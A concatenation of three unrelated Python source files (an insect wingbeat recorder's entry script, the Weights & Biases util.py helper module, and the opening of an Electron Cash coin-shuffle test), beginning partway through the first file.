Process the newly generated wav file by sending it through the classifier and the result to the server.
:param event: Name of the newly generated wav file.
"""
if self.clf and self.nw:
timestamp = os.path.splitext(os.path.basename(event.src_path))[0]
additional_info = self.clf.get_additional_info(timestamp)
label, score = self.clf.classify(event.src_path)
self.nw.send_http(label, timestamp, additional_info, score)
self.clf.remove_from_disk(os.path.normpath(event.src_path))
def on_created(self, event):
"""
Reacts on newly created files.
:param event: Information about a new file given by the OS.
"""
self.process(event)
def main(args):
"""
Creates the recorder to capture wingbeats data and creates an observer to react to new files being created.
:param args: An argparse object containing all relevant arguments.
"""
if not args.permanent:
args.dirpath = "/mnt/ramdisk"
# Create a listener
listener = Listener(args)
# Create an observer looking for new wav files in the given directory.
observer = Observer()
observer.schedule(listener, args.dirpath)
observer.start()
# Creates the recorder to capture wingbeats data from the microphone.
recorder = Recorder(args.dirpath, args.threshold, args.device, args.rec_rate, args.target_rate, args.samples,
args.buffer_size, args.address, args.use_sensor)
p = Process(target=recorder.listen)
p.start()
p.join()
observer.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--dirpath", default="../savedfiles", type=str,
help="Verzeichnis in dem die Dateien abgespeichert werden."
"(Wird nur benutzt wenn die permanent FLAG gesetzt ist, "
"ansonsten wird auf eine RAM-DISK geschrieben und die Dateien nach dem Absenden gelöscht.")
parser.add_argument("--modelpath", default="../model", type=str,
help="Pfad an dem das Modell und die zugehörige JSON abgespeichert ist.")
parser.add_argument("--tokenfile", default="../model/token.json", type=str,
help="Name des Tokenfiles des Sensors.")
parser.add_argument("--permanent", default=False, type=str2bool,
help="Gibt an ob die Daten permanent gespeichert werden oder nach dem Senden gelöscht werden.")
parser.add_argument("--server_url", default="http://192.168.2.104:3000", type=str,
help="URL des InsectCounter Projekts, e.g. https://insectcounter.zapto.org oder "
"http://localhost:3000 wenn der Server lokal läuft")
parser.add_argument("--threshold", default=10, type=int, help="Kleinster RMS um die Aufnahme zu starten.")
parser.add_argument("--device", default=2, type=int, help="Port des Audio Devices.")
parser.add_argument("--target_rate", default=8000, type=int, help="Samplespeed in Hz des Ausgabe Files.")
parser.add_argument("--rec_rate", default=44100, type=int, help="Samplespeed in Hz der eingehenden Aufname.")
parser.add_argument("--samples", default=5000, type=int, help="Anzahl an Samples in einer Aufnahme.")
parser.add_argument("--buffer_size", default=4096, type=int, help="Größe des Buffer.")
parser.add_argument("--address", default=0x76, type=int, help="Adresse des BME280.")
parser.add_argument("--use_sensor", default=False, type=str2bool,
help="Gibt an ob der BME280 Sensor benutzt werden soll.")
args = parser.parse_args()
main(args)
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import colorsys
import codecs
import errno
import hashlib
import json
import getpass
import logging
import os
import re
import shlex
import subprocess
import sys
import threading
import time
import random
import platform
import stat
import shortuuid
import importlib
import types
import yaml
import numbers
from datetime import date, datetime
import click
import requests
import six
from six.moves import queue
import textwrap
from sys import getsizeof
from collections import namedtuple, Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled
import wandb
import wandb.core
from wandb import io_wrap
from wandb import wandb_dir
from wandb.apis import CommError
from wandb import wandb_config
from wandb import env
logger = logging.getLogger(__name__)
_not_importable = set()
OUTPUT_FNAME = 'output.log'
DIFF_FNAME = 'diff.patch'
# these match the environments for gorilla
if wandb.core.IS_GIT:
SENTRY_ENV = 'development'
else:
SENTRY_ENV = 'production'
if error_reporting_enabled():
sentry_sdk.init("https://f84bb3664d8e448084801d9198b771b2@sentry.io/1299483",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV)
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def vendor_import(name):
"""This enables us to use the vendor directory for packages we don't depend on"""
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, 'vendor')
# TODO: this really needs to go, was added for CI
if sys.modules.get("prompt_toolkit"):
for k in list(sys.modules.keys()):
if k.startswith("prompt_toolkit"):
del sys.modules[k]
sys.path.insert(1, vendor_dir)
return import_module(name)
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
we use this for tensorflow and other optional libraries primarily at the top module level
"""
# The lint error here is incorrect.
def __init__(self, local_name, parent_module_globals, name, warning=None): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key))
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key))
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
'You must call wandb.init() before {}.{}'.format(self._name, key))
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
'You must call wandb.init() before {}.{}'.format(self._name, key))
else:
raise AttributeError()
np = get_module('numpy')
MAX_SLEEP_SECONDS = 60 * 5
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split('.')[0] + "." + o.__class__.__name__
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith('tensorflow.') and ('Tensor' in typename or 'Variable' in typename)
def is_tf_eager_tensor_typename(typename):
return typename.startswith('tensorflow.') and ('EagerTensor' in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith('torch.') and ('Tensor' in typename or 'Variable' in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith('pandas.') and 'DataFrame' in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith('.Figure')
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ('outward', 0.0)
if isinstance(position, str):
if position == 'center':
position = ('axes', 0.5)
elif position == 'zero':
position = ('data', 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == 'outward' and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted.")
if not obj.gca().has_data():
raise ValueError(
"You attempted to log an empty plot, pass a figure directly or ensure the global plot isn't closed.")
return obj
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
obj = obj.eval()
elif is_pytorch_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.numpy()
else:
return obj.item(), True
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
elif isinstance(obj, bytes):
obj = obj.decode('utf-8')
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn("Serializing object of type {} that is {} bytes".format(type(obj).__name__, getsizeof(obj)))
return obj, converted
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools", required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`")
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return {
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size
}, True
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ['DISPLAY', 'WAYLAND_DISPLAY', 'MIR_SOCKET']
_WEBBROWSER_NAMES_BLACKLIST = [
'www-browser', 'lynx', 'links', 'elinks', 'w3m']
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if ('linux' in sys.platform and
not any(os.getenv(var) for var in _DISPLAY_VARIABLES)):
launch_browser = False
try:
browser = webbrowser.get()
if (hasattr(browser, 'name')
and browser.name in _WEBBROWSER_NAMES_BLACKLIST):
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id():
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list(
"0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(8)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
def parse_sm_config():
"""Attempts to parse SageMaker configuration returning False if it can't find it"""
sagemaker_config = "/opt/ml/input/config/hyperparameters.json"
resource_config = "/opt/ml/input/config/resourceconfig.json"
if os.path.exists(sagemaker_config) and os.path.exists(resource_config):
conf = {}
conf["sagemaker_training_job_name"] = os.getenv('TRAINING_JOB_NAME')
# Hyper-parameter searchs quote configs...
for k, v in six.iteritems(json.load(open(sagemaker_config))):
cast = v.strip('"')
if os.getenv("WANDB_API_KEY") is None and k == "wandb_api_key":
os.environ["WANDB_API_KEY"] = cast
else:
if re.match(r'^[-\d]+$', cast):
cast = int(cast)
elif re.match(r'^[-.\d]+$', cast):
cast = float(cast)
conf[k] = cast
return conf
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(
tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return 'NaN'
elif obj == float('+inf'):
return 'Infinity'
elif obj == float('-inf'):
return '-Infinity'
return obj
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code == 400:
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
extra = ""
if wandb.run and str(wandb.run.api.api_key).startswith("local-"):
extra = " --host=http://localhost:8080"
if wandb.run.api.api_url == "https://api.wandb.ai":
raise CommError("Attempting to authenticate with the cloud using a local API key. Set WANDB_BASE_URL to your local instance.")
raise CommError("Invalid or missing api_key. Run wandb login" + extra)
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def write_netrc(host, entity, key):
"""Add our host and key to .netrc"""
key_prefix, key_suffix = key.split('-', 1) if '-' in key else ('', key)
if len(key_suffix) != 40:
wandb.termlog('API-key must be exactly 40 characters long: {} ({} chars)'.format(key_suffix, len(key_suffix)))
return None
try:
normalized_host = host.split("/")[-1].split(":")[0]
wandb.termlog("Appending key for {} to your netrc file: {}".format(
normalized_host, os.path.expanduser('~/.netrc')))
machine_line = 'machine %s' % normalized_host
path = os.path.expanduser('~/.netrc')
orig_lines = None
try:
with open(path) as f:
orig_lines = f.read().strip().split('\n')
except (IOError, OSError) as e:
pass
with open(path, 'w') as f:
if orig_lines:
# delete this machine from the file if it's already there.
skip = 0
for line in orig_lines:
if machine_line in line:
skip = 2
elif skip:
skip -= 1
else:
f.write('%s\n' % line)
f.write(textwrap.dedent("""\
machine {host}
login {entity}
password {key}
""").format(host=normalized_host, entity=entity, key=key))
os.chmod(os.path.expanduser('~/.netrc'),
stat.S_IRUSR | stat.S_IWUSR)
return True
except IOError as e:
wandb.termerror("Unable to read ~/.netrc")
return None
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Args:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop('max_retries', 30)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if e.response.status_code in {400, 403, 404, 409}:
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and e.response.status_code == 429:
logger.info(
"Rate limit exceeded, retrying in %s seconds" % delay)
else:
logger.warning('requests_with_retry encountered retryable exception: %s. args: %s, kwargs: %s',
e, args, kwargs)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
except requests.exceptions.RequestException as e:
logger.error(response.json()['error']) # XXX clean this up
logger.exception(
'requests_with_retry encountered unretryable exception: %s', e)
return e
def find_runner(program):
"""Return a command that will run program.
Args:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith('#!'):
return shlex.split(first_line[2:])
if program.endswith('.py'):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode('ascii')
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
return wandb.GLOBAL_LOG_FNAME
def is_wandb_file(name):
return name.startswith('wandb') or name == wandb_config.FNAME or name == "requirements.txt" or name == OUTPUT_FNAME or name == DIFF_FNAME
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$", image)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
If excludes any argments that start with a dash, and the argument after it if it isn't a boolean
switch. This can be improved, we currently fallback gracefully when this fails.
"""
bool_args = ["-t", "--tty", "--rm", "--privileged", "--oom-kill-disable", "--no-healthcheck", "-i",
"--interactive", "--init", "--help", "--detach", "-d", "--sig-proxy", "-it", "-itd"]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/default/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"), os.getenv(
"KUBERNETES_PORT_443_TCP_PORT"), os.getenv("HOSTNAME")
)
try:
res = requests.get(k8s_server, verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3, headers={"Authorization": "Bearer {}".format(open(token_path).read())})
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip("docker-pullable://")
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for upto timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(target=wrapped_target, args=(q,)+args, kwargs=kwargs)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [colorsys.hsv_to_rgb(i / (class_count - 1.), 1.0, 1.0) for i in range(class_count-1)]
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Args:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return 'label'
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return 'image'
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return 'image'
else:
# (samples, height, width, logits)
return 'segmentation_mask'
return None
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if "/" in dest_path:
dir = "/".join(dest_path.split("/")[0:-1])
mkdir_exists_ok(dir)
with open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def set_api_key(api, key, anonymous=False):
if not key:
return
# Normal API keys are 40-character hex strings. Onprem API keys have a
# variable-length prefix, a dash, then the 40-char string.
prefix, suffix = key.split('-') if '-' in key else ('', key)
if len(suffix) == 40:
os.environ[env.API_KEY] = key
api.set_setting('anonymous', str(anonymous).lower(), globally=True, persist=True)
write_netrc(api.api_url, "user", key)
api.reauth()
return
raise ValueError("API key must be 40 characters long, yours was %s" % len(key))
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
LOGIN_CHOICE_ANON = 'Private W&B dashboard, no account required'
LOGIN_CHOICE_NEW = 'Create a W&B account'
LOGIN_CHOICE_EXISTS = 'Use an existing W&B account'
LOGIN_CHOICE_DRYRUN = "Don't visualize my results"
LOGIN_CHOICES = [
LOGIN_CHOICE_ANON,
LOGIN_CHOICE_NEW,
LOGIN_CHOICE_EXISTS,
LOGIN_CHOICE_DRYRUN
]
def prompt_api_key(api, input_callback=None, browser_callback=None, no_offline=False, local=False):
input_callback = input_callback or getpass.getpass
choices = [choice for choice in LOGIN_CHOICES]
if os.environ.get(env.ANONYMOUS, "never") == "never":
# Omit LOGIN_CHOICE_ANON as a choice if the env var is set to never
choices.remove(LOGIN_CHOICE_ANON)
if os.environ.get(env.JUPYTER, "false") == "true" or no_offline:
choices.remove(LOGIN_CHOICE_DRYRUN)
if os.environ.get(env.ANONYMOUS) == "must":
result = LOGIN_CHOICE_ANON
# If we're not in an interactive environment, default to dry-run.
elif not isatty(sys.stdout) or not isatty(sys.stdin):
result = LOGIN_CHOICE_DRYRUN
elif local:
result = LOGIN_CHOICE_EXISTS
else:
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
def prompt_choice():
try:
return int(six.moves.input("%s: Enter your choice: " % wandb.core.LOG_STRING)) - 1
except ValueError:
return -1
idx = -1
while idx < 0 or idx > len(choices) - 1:
idx = prompt_choice()
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
if result == LOGIN_CHOICE_ANON:
key = api.create_anonymous_api_key()
set_api_key(api, key, anonymous=True)
return key
elif result == LOGIN_CHOICE_NEW:
key = browser_callback(signup=True) if browser_callback else None
if not key:
wandb.termlog('Create an account here: {}/authorize?signup=true'.format(api.app_url))
key = input_callback('%s: Paste an API key from your profile and hit enter' % wandb.core.LOG_STRING).strip()
set_api_key(api, key)
return key
elif result == LOGIN_CHOICE_EXISTS:
key = browser_callback() if browser_callback else None
if not key:
wandb.termlog('You can find your API key in your browser here: {}/authorize'.format(api.app_url))
key = input_callback('%s: Paste an API key from your profile and hit enter' % wandb.core.LOG_STRING).strip()
set_api_key(api, key)
return key
else:
# Jupyter environments don't have a tty, but we can still try logging in using the browser callback if one
# is supplied.
key, anonymous = browser_callback() if os.environ.get(env.JUPYTER, "false") == "true" and browser_callback else (None, False)
set_api_key(api, key, anonymous=anonymous)
return key
def sizeof_fmt(num, suffix='B'):
"""Pretty print file size
https://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
"""
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def auto_project_name(program, api):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = api.git.root_dir
if root_dir is None:
return None
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != '.':
project += '-' + sub_path
return project.replace(os.sep, '_')
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Args:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return 'Expected string sweep_id'
sweep_split = sweep_id.split('/')
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return 'Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep'
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
def has_num(dictionary, key):
return (key in dictionary and isinstance(dictionary[key], numbers.Number))
def get_program():
try:
import __main__
program = __main__.__file__
except (ImportError, AttributeError):
program = None
return program
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder('hex')(bytestr)[0].decode('ascii')
|
test.py
|
import unittest
import configparser
import subprocess
import os, sys
import random
import ecdsa
import threading
import time
import imp
sys.path.append(os.path.realpath(os.path.dirname(__file__)+"/../../../"))
imp.load_module('electroncash', *imp.find_module('lib'))
imp.load_module('electroncash_gui', *imp.find_module('gui/qt'))
imp.load_module('electroncash_plugins', *imp.find_module('plugins'))
from electroncash.address import Address
from electroncash.util import InvalidPassword
from electroncash_plugins.shuffle.client import ProtocolThread
from electroncash_plugins.shuffle.comms import (ChannelWithPrint, Channel)
from electroncash_plugins.shuffle.coin import Coin
from electroncash_plugins.shuffle.crypto import Crypto
# from electroncash_plugins.shuffle.phase import Phase
from electroncash_plugins.shuffle.round import Round
from electroncash.bitcoin import (regenerate_key, deserialize_privkey, EC_KEY, generator_secp256k1,
number_to_string ,public_key_to_p2pkh, point_to_ser, Hash)
class testNetwork(object):
"simple class for emulating the network. You can make your own utxo pool for test"
def __init__(self):
self.coins = {}
self.should_be_connected = True
